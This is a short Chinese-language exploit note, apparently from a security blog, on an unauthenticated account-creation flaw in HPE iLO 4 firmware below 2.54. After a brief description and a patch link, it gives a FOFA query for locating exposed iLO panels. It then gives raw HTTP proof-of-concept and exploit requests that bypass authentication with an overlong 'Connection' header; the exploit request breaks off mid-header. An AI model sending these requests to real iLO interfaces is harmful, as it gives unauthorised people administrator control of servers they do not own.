原理未授权访问,由于添加用户操作未对操作者的身份进行验证,导致未授权用户添加。影响范围iLO 4 固件版本低于2.54 的2.xx版本危害获取Web面板完整访问权限,可通过惠普iLO自带的远控软件对主机进行控制。下载地址为:https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8POC & EXPfofatitle="iLO"手工# POC GET /rest/v1/AccountService/Accounts HTTP/1.1 Host: x.x.x.x:x Content-Length: 273 Accept-Encoding: gzip, deflate Accept: */* Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA Content-Type: application/json # EXP POST /rest/v1/AccountService/Accounts HTTP/1.1 Host: x.x.x.x:x C
Equinox
一个乐于分享的网安人